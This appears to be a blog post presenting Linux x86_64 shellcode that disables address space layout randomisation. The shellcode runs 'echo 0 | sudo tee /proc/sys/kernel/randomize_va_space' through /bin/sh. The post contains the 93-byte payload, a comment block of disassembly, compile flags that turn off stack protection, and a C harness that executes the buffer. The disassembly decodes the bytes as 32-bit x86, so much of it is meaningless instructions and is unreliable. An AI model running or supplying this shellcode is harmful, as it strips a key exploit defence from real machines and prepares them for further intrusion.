Sunday, December 30, 2018

shellcode ASLR disable

/*
ASLR (Address Space Layout Randomization) Disable Shellcode Language C & ASM - Linux/x86_64

Author : Kağan Çapar
contact: kagancapar@gmail.com
shellcode len : 93 bytes
compilation: gcc -fno-stack-protector -z execstack [.c] -o []

Test:
run shellcode (./aslr etc.)
check : cat /proc/sys/kernel/randomize_va_space
you will see "0"

Assembly:

global _start
section .ASLR
_start:

#6A3B push byte +0x3b
#58 pop eax
#99 cdq
#48 dec eax
#BB2F62696E mov ebx,0x6e69622f
#2F das
#7368 jnc 0x75
#005348 add [ebx+0x48],dl
#89E7 mov edi,esp
#682D630000 push dword 0x632d
#48 dec eax
#89E6 mov esi,esp
#52 push edx
#E836000000 call 0x56
#6563686F arpl [gs:eax+0x6f],bp
#2030 and [eax],dh
#207C2073 and [eax+0x73],bh
#7564 jnz 0x90
#6F outsd
#20746565 and [ebp+0x65],dh
#202F and [edi],ch
#7072 jo 0xa7
#6F outsd
#632F arpl [edi],bp
#7379 jnc 0xb3
#732F jnc 0x6b
#6B65726E imul esp,[ebp+0x72],byte +0x6e
#656C gs insb
#2F das
#7261 jc 0xa6
#6E outsb
#646F fs outsd
#6D insd
#697A655F76615F imul edi,[edx+0x65],dword 0x5f61765f
#7370 jnc 0xc2
#61 popa
#636500 arpl [ebp+0x0],sp
#56 push esi
#57 push edi
#48 dec eax
#89E6 mov esi,esp
#0F05 syscall

*/

#include
#include

unsigned char ASLR[] = \
"\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00\x53"
"\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6\x52\xe8\x36\x00"
"\x00\x00\x65\x63\x68\x6f\x20\x30\x20\x7c\x20\x73\x75\x64\x6f"
"\x20\x74\x65\x65\x20\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f"
"\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x7a"
"\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65\x00\x56\x57\x48\x89"
"\xe6\x0f\x05";

int main()
{
printf("Shellcode len: %d\n", strlen(ASLR));

int (*ret)() = (int(*)())ASLR;

ret();

}

No comments:

Post a Comment

Thank you for your comment. Will try to react as soon as possible.

Regards,

Networ King